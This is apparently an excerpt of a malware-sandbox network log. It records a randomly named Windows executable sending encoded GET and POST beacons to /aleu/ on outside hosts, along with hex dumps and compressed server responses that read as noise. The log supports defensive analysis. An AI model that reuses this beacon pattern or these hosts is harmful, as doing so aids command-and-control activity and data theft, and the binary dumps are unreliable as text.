                                                                                                                                                                                                        28192.168.2.449772103.93.125.69804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:23:04.241189957 CEST473OUTGET /aleu/?jn4lNb=/mfxaTJBOgt3JDZn0BatbUHTEszIrcd1tbJm5eA1/p+8DdahBUuKuoWdPETp4wIg5O58ph7A0hS6+wjYiiGEuNl9oe0KYtPyQihSGvBT9JqjuFq9ou3hQwM=&jvudu=jXz4lVThP2GL4N HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Host: www.83634.cn
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        May 8, 2024 18:23:04.584686995 CEST1289INHTTP/1.1 530
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:23:04 GMT
                                                                                                                                                                                                        Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: 8080
                                                                                                                                                                                                        Data Raw: 31 30 33 61 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e e5 9f [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: 103a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title></title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><style>*, body, html { margin: 0; padding: 0;}body, html { --text-opacity: 1; color: #404040; color: rgba(64,64,64,var(--text-opacity)); -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; font-family: system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color [TRUNCATED]
                                                                                                                                                                                                        May 8, 2024 18:23:04.584809065 CEST1289INData Raw: 62 75 74 65 73 20 53 74 79 6c 65 5d 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 6c 6f 63 61 6c 65 3a 20 22 65 6e 2d 55 53 22 3b 0a 7d 0a 2e 70 2d 30 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 0a 0a 2e 77 2d 32 34 30 20 7b 0a
                                                                                                                                                                                                        Data Ascii: butes Style] { -webkit-locale: "en-US";}.p-0 { padding: 0;}.w-240 { width: 60rem;}.antialiased { -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;}.pt-10 { padding-top: 2.5rem;}.mb-15
                                                                                                                                                                                                        May 8, 2024 18:23:04.584878922 CEST1289INData Raw: 6d 78 2d 61 75 74 6f 20 70 74 2d 31 30 20 6c 67 3a 70 74 2d 36 20 6c 67 3a 70 78 2d 38 20 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 62 2d 31 35 20 61 6e 74 69 61 6c 69 61 73 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61
                                                                                                                                                                                                        Data Ascii: mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased"> <h1 class="inline-block md:block mr-2 md:mb-2 font-light text-60 md:text-3xl text-black-dark leading-tight"> <span data-translate="error">Error</span>
                                                                                                                                                                                                        May 8, 2024 18:23:04.584898949 CEST454INData Raw: 3d 22 77 68 61 74 5f 63 61 6e 5f 69 5f 64 6f 22 3e e5 a6 82 e4 bd 95 e8 a7 a3 e5 86 b3 3f 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e e8 af b7 e5 88 b0 43 44 4e e5 90 8e e5 8f b0 e6 b7 bb e5 8a a0 e6 ad a4 e5 9f 9f e5 90 8d ef
                                                                                                                                                                                                        Data Ascii: ="what_can_i_do">?</h2> <p>CDN</p> </div> </section> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        29192.168.2.4497733.73.27.108804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:23:19.606301069 CEST757OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.valentinaetommaso.it
                                                                                                                                                                                                        Origin: http://www.valentinaetommaso.it
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 203
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.valentinaetommaso.it/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Raw: 6a 6e 34 6c 4e 62 3d 6e 4c 77 37 62 41 57 64 69 61 50 47 46 62 33 37 51 75 6b 79 45 2f 47 75 32 4d 4e 6a 38 44 46 51 4e 75 44 55 73 2f 31 46 4c 5a 6c 70 78 79 67 79 6e 66 6b 49 48 70 74 6a 59 6a 44 71 79 38 6e 6d 63 6e 61 57 52 77 65 53 34 74 54 55 4c 4d 46 71 45 45 4c 7a 47 76 44 4c 6c 55 31 65 54 45 4f 59 6d 54 55 37 6d 78 58 75 6a 53 33 4f 41 37 50 65 4e 58 39 2b 67 55 37 68 54 31 76 53 51 38 46 7a 4d 5a 36 36 34 38 37 2b 31 63 69 4e 54 61 46 50 73 69 76 6c 47 49 62 74 4b 74 58 55 57 59 6d 6c 59 72 6e 76 6f 59 6e 31 36 4e 54 4b 4d 78 43 65 72 6f 63 6c 36 78 51 37 79 63 56 31 5a 4a 38 53 6e 67 3d 3d
                                                                                                                                                                                                        Data Ascii: jn4lNb=nLw7bAWdiaPGFb37QukyE/Gu2MNj8DFQNuDUs/1FLZlpxygynfkIHptjYjDqy8nmcnaWRweS4tTULMFqEELzGvDLlU1eTEOYmTU7mxXujS3OA7PeNX9+gU7hT1vSQ8FzMZ66487+1ciNTaFPsivlGIbtKtXUWYmlYrnvoYn16NTKMxCerocl6xQ7ycV1ZJ8Sng==
                                                                                                                                                                                                        May 8, 2024 18:23:19.977943897 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:23:19 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Set-Cookie: PHPSESSID=l8olb7ovn3cj4jo296okddhtgs; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                        Data Raw: 33 37 38 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d dd 76 db c6 92 ee f5 de 6b cd 3b 20 9c 49 22 9d 88 e0 af 48 51 16 9d 51 64 39 d6 19 cb d6 b6 e4 64 f6 b6 3d 5c 20 08 92 88 49 80 26 40 c9 b2 e2 07 3b d7 e7 c5 ce f7 55 77 03 0d fe 48 b4 93 59 b3 2f 8e 97 25 81 e8 ee ea ea ea ea aa ea ea aa e6 d1 37 4f 5e 9e 5c fd fd e2 d4 19 a7 d3 c9 e3 bf 1e f1 8f e3 4f bc 24 e9 96 a2 b8 fc 5b 52 72 66 f3 60 18 7e ec 96 e2 d1 21 6a a5 b3 e4 b0 52 89 47 33 77 1a 54 a2 e4 5f 4b ce c4 8b 46 dd 52 98 96 1e ff 0b da 07 de e0 f1 d1 24 8c de 3b f3 60 d2 2d a1 b1 1f 47 51 e0 a7 25 67 0c 40 dd 92 01 31 a8 0d c2 fa e4 d3 62 dc 69 0f c7 75 d7 9f c4 8b c1 70 1e 47 a9 1b 05 a8 ec cf e3 24 89 e7 e1 28 8c b6 83 37 44 d3 c4 1d 25 a9 97 86 be eb c7 d3 25 18 d3 20 f5 1c 7f ec cd 93 20 ed 96 16 e9 b0 7c 50 b2 21 87 c0 f3 8b 70 ac 0c c3 49 90 54 ea 03 fc 0f f9 73 dd 18 bb c9 f5 e8 c7 d9 b8 eb f7 1b 5e fb 20 e8 ec b7 4b 4e 7a 3b 0b 40 9f a9 37 0a 2a 28 fe e1 e3 74 52 72 92 f0 53 00 12 7b d1 ed 9f 82 44 b5 5d a9 b6 87 fc f9 f4 e1 e0 [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: 3784}vk; I"HQQd9d=\ I&@;UwHY/%7O^\O$[Rrf`~!jRG3wT_KFR$;`-GQ%g@1biupG$(7D%% |P!pITs^ KNz;@7*(tRrS{D]K>Z*i.(Dl6i#/2w9,>.? v(iNj);8s8ry|iix3Tx:hD,w7xdz;C?(0)4M8YQ9fq8Oc/Xz)Ujs`d}i0=0B"`p@f<VJcEggF*U&?KM_i7`OJaMOfvI?DN#O:|dnA'`(?jPAc8AOg;elU^?im)^&%r:$iY*5/p6XYhgUkjmX;;w u7GI]yw&JVw|G5
                                                                                                                                                                                                        May 8, 2024 18:23:19.977967024 CEST1289INData Raw: ac ee a5 dd 41 ec 2f a6 d0 1b ee 87 45 30 bf bd 0c 26 30 c8 e2 f9 f1 64 b2 f3 3d 2d 36 e7 b1 43 29 f4 86 22 fb 7f 75 4b 90 bc a5 77 6f b4 b0 bd 7f 11 bf fb 7e f7 51 70 94 ba 50 4a a3 74 fc 28 f8 e1 87 dd f4 4d f0 ce 9d 07 d3 f8 3a 38 4e a1 b6 fa
                                                                                                                                                                                                        Data Ascii: A/E0&0d=-6C)"uKwo~QpPJt(M:8N4)WB7;{{05{&|4h!u)l$tHaSXoqE 0&1Jn:ih[dB;xi)VsVNrPA48F^dU+t";^8B
                                                                                                                                                                                                        May 8, 2024 18:23:19.978029013 CEST1289INData Raw: df 51 38 9c 43 de c8 b3 03 ea e4 2e 47 ae de 51 1c 8f 60 17 7b a3 a9 17 61 74 73 7a 0a e1 c7 74 e9 f8 fc 31 1c 74 7f be 3a 2f ef 37 eb e7 e7 97 cf 4b 0a c4 38 a0 a3 a3 0b c6 51 9f 95 0f 25 fb 28 5a ac 4b fb 16 2c 7f 7b 08 c1 11 3c ba 0e 93 10 ca
                                                                                                                                                                                                        Data Ascii: Q8C.GQ`{atszt1t:/7K8Q%(ZK,{<2Lo`DcPG}Lf8h'LAQYqv@Ia<dB' ]QeT$@*c?,d>B<ix(yqyV]edQfRqRjTOZR:vr
                                                                                                                                                                                                        May 8, 2024 18:23:19.978041887 CEST1289INData Raw: 86 d8 e3 94 1e 9f 3d 77 ce 8f af 5e 9d 9d bf 7c 71 f6 d2 79 72 e6 6c 36 12 95 6d 08 ae 53 56 97 da cb 69 9d 61 99 40 1c fc 97 e3 71 b5 48 53 f8 e1 e1 e4 87 1f 1e 4f f3 10 1e 79 04 69 84 df 45 fd 64 f6 88 7e 48 dd 33 f6 f2 6b 50 30 8b 62 2d 59 68
                                                                                                                                                                                                        Data Ascii: =w^|qyrl6mSVia@qHSOyiEd~H3kP0b-Yh0!`5*-K/!,dI@M_P!r2S\^/R~<4\LjI^ )~0`pP&gz8>}L\W=KZd_4r0H
                                                                                                                                                                                                        May 8, 2024 18:23:19.978055000 CEST1289INData Raw: 36 c4 33 64 70 1d 7c 71 50 af 0b 86 2d f5 0c 62 ca f2 c0 14 91 d6 42 4b d2 fa 17 ce 32 56 74 46 6c 0e 82 44 06 16 8a da 20 23 c0 52 98 74 9a 6c 07 51 a9 1e 65 14 32 f4 0e 16 7c c3 05 8f 61 dc 1d 52 a0 7e a0 1e 9b 20 a6 d4 a8 77 48 87 da 3e 75 0e
                                                                                                                                                                                                        Data Ascii: 63dp|qP-bBK2VtFlD #RtlQe2|aR~ wH>ue@jEXn_>}G"Oii+[o3&;C@b_lX KUAd?8}eR[8Vkk?}0)[$cbLAc&TObq
                                                                                                                                                                                                        May 8, 2024 18:23:19.978068113 CEST1289INData Raw: ce ae ce 5e be 38 7e be 4d ed cb 67 67 17 17 e8 b0 77 f2 f2 d2 80 06 c2 88 c7 ff 0d eb ab c7 c8 0e 61 c3 e4 9c d2 84 42 6e c1 e8 1b 83 43 a8 de 63 1b 05 0b cf bf cd de cb e8 7a a9 f7 b1 17 44 ca aa 39 2c d5 24 80 7c 81 04 95 5b cc e7 80 cb 1c b1
                                                                                                                                                                                                        Data Ascii: ^8~MggwaBnCczD9,$|[N:W}1/*om^#lG_=Gsu~[y[Yv~#mEZ}r#C?y`c[_{kFO4ATJHlSWJ$z7I/iRoo5x[
                                                                                                                                                                                                        May 8, 2024 18:23:19.978094101 CEST1289INData Raw: e1 c4 7a cf 5c 7d 88 f1 a5 f7 7a 9c 3d 45 75 6e 77 00 51 ba 38 86 6f f8 16 16 62 2e a4 46 57 9e 4c 95 a2 dc e8 78 90 70 e2 0c a1 99 cb 4d 26 ef 63 aa ef 4a 4f 8e af 4e 7b 57 67 e7 a7 fc 80 9b 8c de 83 84 df 0e dc 6f a7 ee b7 7f 77 be 7d 76 f8 ed
                                                                                                                                                                                                        Data Ascii: z\}z=EunwQ8ob.FWLxpM&cJON{Wgow}v9cKvvv?!g7;IW{PRW&ywgnn7);Ue>fP^3J/'_:}qY?zi4..>n8p|
                                                                                                                                                                                                        May 8, 2024 18:23:19.978112936 CEST1289INData Raw: 3e bc 18 a6 9a 07 91 87 6e 16 13 6f 9e 11 f9 e1 f1 73 dc 70 27 d0 53 62 48 71 df a8 b3 69 90 68 4a 8e 63 9a 0d 6f 10 4f 43 1f e1 5c e8 df 39 ce de e6 23 45 34 18 a2 b8 30 50 5c 59 ec 8d 64 f8 98 ac 10 26 19 e8 07 8b 87 37 e0 39 c7 b8 0e 47 46 8d
                                                                                                                                                                                                        Data Ascii: >nosp'SbHqihJcoOC\9#E40P\Yd&79GFO,j)R6ux9\(/)S,]1Pg8qj%y#lPZ*D_"!9n^h$7w{kx~4gj@:*KB-\sM+^ 2(|X
                                                                                                                                                                                                        May 8, 2024 18:23:19.978125095 CEST1289INData Raw: 82 6c 7b 0a 63 49 13 1e a1 f3 3c bf 57 a7 f2 17 b0 82 fe 01 dc f0 25 59 22 76 5f 2c e2 6b f8 6e 61 88 dc 5b 7b 36 c7 57 fe 30 45 04 6a 19 75 99 c7 85 8c 1a 6c 01 ad 4e e0 23 31 07 4f 4a be c3 ac f5 83 71 3c c1 96 1c 6a 6c 18 9f eb 43 89 c4 cd 8e
                                                                                                                                                                                                        Data Ascii: l{cI<W%Y"v_,kna[{6W0EjulN#1OJq<jlC=``]hw) 8dPRG=p$z8kO<0WUN$=t^#dqs% :oq6xwUJA-UpIf:KhM6*T_
                                                                                                                                                                                                        May 8, 2024 18:23:19.978137016 CEST1289INData Raw: 38 93 3f 4b e7 d8 2c 61 26 cd e6 0d 6e 56 14 20 60 74 7d 77 fc 32 5f 2d 02 4e f8 d5 69 1b 6a f1 c6 8f 8b 7c 17 4b a6 65 6d dc 71 b0 be 01 0e 22 fc f1 59 64 11 ef cc ce 50 3b d6 fe 1d 6e 7f c5 31 2f e6 67 e6 43 3f 7b 72 8a ef 2d 78 7a 76 fa 2a 73
                                                                                                                                                                                                        Data Ascii: 8?K,a&nV `t}w2_-Nij|Kemq"YdP;n1/gC?{r-xzv*s3LIF:\+S{w=@{l9yjlK^|Sh78td(l/|%H})0fZZP}N?V-AfQ`@P
                                                                                                                                                                                                        May 8, 2024 18:23:20.292618990 CEST1289INData Raw: b7 54 ff b5 bc 5d df 02 3e d7 79 da c3 d5 1d d2 08 5f 5d 32 ed e3 22 00 1e c1 58 c8 5d b2 12 92 40 51 4d 7a 73 ce a5 9a 73 cc 6a 0a 4f 04 ad 3f 04 e5 14 57 ee dd 0b 03 e6 f5 4d 4f 22 c5 e4 36 99 15 aa c2 04 ba c1 28 10 49 26 e5 39 61 31 f2 fc b5
                                                                                                                                                                                                        Data Ascii: T]>y_]2"X]@QMzssjO?WMO"6(I&9a1FSBFy<]b=JK9S!L rNlK[f3eN-4El'cA)"+I!U9~)#qjy8PE/8f)1["zb5yVEnzy


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        30192.168.2.4497743.73.27.108804500C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        May 8, 2024 18:23:22.451828003 CEST777OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        Host: www.valentinaetommaso.it
                                                                                                                                                                                                        Origin: http://www.valentinaetommaso.it
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Content-Length: 223
                                                                                                                                                                                                        Cache-Control: max-age=0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Referer: http://www.valentinaetommaso.it/aleu/
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                                                        Data Raw: 6a 6e 34 6c 4e 62 3d 6e 4c 77 37 62 41 57 64 69 61 50 47 48 2b 2f 37 44 49 73 79 54 50 47 74 7a 4d 4e 6a 70 7a 46 63 4e 75 48 55 73 2b 77 65 49 71 52 70 78 58 63 79 6d 62 51 49 4f 35 74 6a 58 44 44 72 76 4d 6e 76 63 6e 47 30 52 30 57 53 34 74 58 55 4c 4a 35 71 48 7a 66 77 47 2f 44 4a 6a 55 31 6d 64 6b 4f 59 6d 54 55 37 6d 77 7a 55 6a 53 76 4f 41 76 7a 65 4e 32 39 35 38 45 37 6d 44 46 76 53 55 38 46 4a 4d 5a 37 76 34 34 62 55 31 65 71 4e 54 59 64 50 73 33 44 36 54 59 62 6a 55 64 57 33 52 59 50 43 52 65 4b 5a 72 5a 62 61 6c 39 6a 55 41 58 54 45 36 5a 39 79 6f 78 30 49 76 62 63 42 55 4b 42 62 38 6e 42 31 59 67 77 72 75 70 4a 41 33 6b 6d 33 4a 33 4d 34 6e 6c 38 3d
                                                                                                                                                                                                        Data Ascii: jn4lNb=nLw7bAWdiaPGH+/7DIsyTPGtzMNjpzFcNuHUs+weIqRpxXcymbQIO5tjXDDrvMnvcnG0R0WS4tXULJ5qHzfwG/DJjU1mdkOYmTU7mwzUjSvOAvzeN2958E7mDFvSU8FJMZ7v44bU1eqNTYdPs3D6TYbjUdW3RYPCReKZrZbal9jUAXTE6Z9yox0IvbcBUKBb8nB1YgwrupJA3km3J3M4nl8=
                                                                                                                                                                                                        May 8, 2024 18:23:22.864010096 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                        Date: Wed, 08 May 2024 16:23:22 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Set-Cookie: PHPSESSID=hqf05dav11336ugatuqh0ulgaq; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                        Data Raw: 33 37 38 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d dd 76 db c6 92 ee f5 de 6b cd 3b 20 9c 49 22 9d 88 e0 af 48 51 16 9d 51 64 39 d6 19 cb d6 b6 e4 64 f6 b6 3d 5c 20 08 92 88 49 80 26 40 c9 b2 e2 07 3b d7 e7 c5 ce f7 55 77 03 0d fe 48 b4 93 59 b3 2f 8e 97 25 81 e8 ee ea ea ea ea aa ea ea aa e6 d1 37 4f 5e 9e 5c fd fd e2 d4 19 a7 d3 c9 e3 bf 1e f1 8f e3 4f bc 24 e9 96 a2 b8 fc 5b 52 72 66 f3 60 18 7e ec 96 e2 d1 21 6a a5 b3 e4 b0 52 89 47 33 77 1a 54 a2 e4 5f 4b ce c4 8b 46 dd 52 98 96 1e ff 0b da 07 de e0 f1 d1 24 8c de 3b f3 60 d2 2d a1 b1 1f 47 51 e0 a7 25 67 0c 40 dd 92 01 31 a8 0d c2 fa e4 d3 62 dc 69 0f c7 75 d7 9f c4 8b c1 70 1e 47 a9 1b 05 a8 ec cf e3 24 89 e7 e1 28 8c b6 83 37 44 d3 c4 1d 25 a9 97 86 be eb c7 d3 25 18 d3 20 f5 1c 7f ec cd 93 20 ed 96 16 e9 b0 7c 50 b2 21 87 c0 f3 8b 70 ac 0c c3 49 90 54 ea 03 fc 0f f9 73 dd 18 bb c9 f5 e8 c7 d9 b8 eb f7 1b 5e fb 20 e8 ec b7 4b 4e 7a 3b 0b 40 9f a9 37 0a 2a 28 fe e1 e3 74 52 72 92 f0 53 00 12 7b d1 ed 9f 82 44 b5 5d a9 b6 87 fc f9 f4 e1 e0 [TRUNCATED]
                                                                                                                                                                                                        Data Ascii: 3784}vk; I"HQQd9d=\ I&@;UwHY/%7O^\O$[Rrf`~!jRG3wT_KFR$;`-GQ%g@1biupG$(7D%% |P!pITs^ KNz;@7*(tRrS{D]K>Z*i.(Dl6i#/2w9,>.? v(iNj);8s8ry|iix3Tx:hD,w7xdz;C?(0)4M8YQ9fq8Oc/Xz)Ujs`d}i0=0B"`p@f<VJcEggF*U&?KM_i7`OJaMOfvI?DN#O:|dnA'`(?jPAc8AOg;elU^?im)^&%r:$iY*5/p6XYhgUkjmX;;w u7GI]yw&JVw|G5
                                                                                                                                                                                                        May 8, 2024 18:23:22.864037037 CEST1289INData Raw: ac ee a5 dd 41 ec 2f a6 d0 1b ee 87 45 30 bf bd 0c 26 30 c8 e2 f9 f1 64 b2 f3 3d 2d 36 e7 b1 43 29 f4 86 22 fb 7f 75 4b 90 bc a5 77 6f b4 b0 bd 7f 11 bf fb 7e f7 51 70 94 ba 50 4a a3 74 fc 28 f8 e1 87 dd f4 4d f0 ce 9d 07 d3 f8 3a 38 4e a1 b6 fa
                                                                                                                                                                                                        Data Ascii: A/E0&0d=-6C)"uKwo~QpPJt(M:8N4)WB7;{{05{&|4h!u)l$tHaSXoqE 0&1Jn:ih[dB;xi)VsVNrPA48F^dU+t";^8B
                                                                                                                                                                                                        May 8, 2024 18:23:22.864049911 CEST1289INData Raw: df 51 38 9c 43 de c8 b3 03 ea e4 2e 47 ae de 51 1c 8f 60 17 7b a3 a9 17 61 74 73 7a 0a e1 c7 74 e9 f8 fc 31 1c 74 7f be 3a 2f ef 37 eb e7 e7 97 cf 4b 0a c4 38 a0 a3 a3 0b c6 51 9f 95 0f 25 fb 28 5a ac 4b fb 16 2c 7f 7b 08 c1 11 3c ba 0e 93 10 ca
                                                                                                                                                                                                        Data Ascii: Q8C.GQ`{atszt1t:/7K8Q%(ZK,{<2Lo`DcPG}Lf8h'LAQYqv@Ia<dB' ]QeT$@*c?,d>B<ix(yqyV]edQfRqRjTOZR:vr
                                                                                                                                                                                                        May 8, 2024 18:23:22.864075899 CEST1289INData Raw: 86 d8 e3 94 1e 9f 3d 77 ce 8f af 5e 9d 9d bf 7c 71 f6 d2 79 72 e6 6c 36 12 95 6d 08 ae 53 56 97 da cb 69 9d 61 99 40 1c fc 97 e3 71 b5 48 53 f8 e1 e1 e4 87 1f 1e 4f f3 10 1e 79 04 69 84 df 45 fd 64 f6 88 7e 48 dd 33 f6 f2 6b 50 30 8b 62 2d 59 68
                                                                                                                                                                                                        Data Ascii: =w^|qyrl6mSVia@qHSOyiEd~H3kP0b-Yh0!`5*-K/!,dI@M_P!r2S\^/R~<4\LjI^ )~0`pP&gz8>}L\W=KZd_4r0H
                                                                                                                                                                                                        May 8, 2024 18:23:22.864090919 CEST1289INData Raw: 36 c4 33 64 70 1d 7c 71 50 af 0b 86 2d f5 0c 62 ca f2 c0 14 91 d6 42 4b d2 fa 17 ce 32 56 74 46 6c 0e 82 44 06 16 8a da 20 23 c0 52 98 74 9a 6c 07 51 a9 1e 65 14 32 f4 0e 16 7c c3 05 8f 61 dc 1d 52 a0 7e a0 1e 9b 20 a6 d4 a8 77 48 87 da 3e 75 0e
                                                                                                                                                                                                        Data Ascii: 63dp|qP-bBK2VtFlD #RtlQe2|aR~ wH>ue@jEXn_>}G"Oii+[o3&;C@b_lX KUAd?8}eR[8Vkk?}0)[$cbLAc&TObq
                                                                                                                                                                                                        May 8, 2024 18:23:22.864111900 CEST1289INData Raw: ce ae ce 5e be 38 7e be 4d ed cb 67 67 17 17 e8 b0 77 f2 f2 d2 80 06 c2 88 c7 ff 0d eb ab c7 c8 0e 61 c3 e4 9c d2 84 42 6e c1 e8 1b 83 43 a8 de 63 1b 05 0b cf bf cd de cb e8 7a a9 f7 b1 17 44 ca aa 39 2c d5 24 80 7c 81 04 95 5b cc e7 80 cb 1c b1
                                                                                                                                                                                                        Data Ascii: ^8~MggwaBnCczD9,$|[N:W}1/*om^#lG_=Gsu~[y[Yv~#mEZ}r#C?y`c[_{kFO4ATJHlSWJ$z7I/iRoo5x[
                                                                                                                                                                                                        May 8, 2024 18:23:22.864125013 CEST1289INData Raw: e1 c4 7a cf 5c 7d 88 f1 a5 f7 7a 9c 3d 45 75 6e 77 00 51 ba 38 86 6f f8 16 16 62 2e a4 46 57 9e 4c 95 a2 dc e8 78 90 70 e2 0c a1 99 cb 4d 26 ef 63 aa ef 4a 4f 8e af 4e 7b 57 67 e7 a7 fc 80 9b 8c de 83 84 df 0e dc 6f a7 ee b7 7f 77 be 7d 76 f8 ed
                                                                                                                                                                                                        Data Ascii: z\}z=EunwQ8ob.FWLxpM&cJON{Wgow}v9cKvvv?!g7;IW{PRW&ywgnn7);Ue>fP^3J/'_:}qY?zi4..>n8p|
